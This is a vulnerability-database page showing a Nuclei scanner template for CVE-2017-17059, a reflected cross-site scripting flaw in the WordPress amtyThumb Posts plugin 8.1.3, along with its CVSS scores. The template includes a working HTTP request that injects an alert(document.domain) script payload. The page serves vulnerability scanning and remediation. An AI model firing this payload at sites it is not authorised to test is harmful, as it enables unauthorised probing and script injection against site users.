Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-17059
HistoryJul 16, 2021 - 4:25 a.m.

WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting

2021-07-1604:25:24
ProjectDiscovery
github.com
5

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

64.4%

WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php.

id: CVE-2017-17059

info:
  name: WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser.
  remediation: |
    Update to the latest version of amtyThumb Posts plugin or apply the patch provided by the vendor.
  reference:
    - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
    - https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2017-17059
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-17059
    cwe-id: CWE-79
    epss-score: 0.00242
    epss-percentile: 0.642
    cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: "amtythumb_project"
    product: amtythumb
    framework: wordpress
  tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Amty Thumb'
          - 'Tags:'
        condition: and
        case-insensitive: true

  - method: POST
    path:
      - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"

    body: "amty_hidden=1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207165561de2b8f1a952c469829aebbb12531a91fa1278fec5395300eab35aa65602210095f1fa0f9ead77f9384a3fe37c498242d9bd2c4efee9a3b8c302a6b2c0fcd11d:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

64.4%

Related for NUCLEI:CVE-2017-17059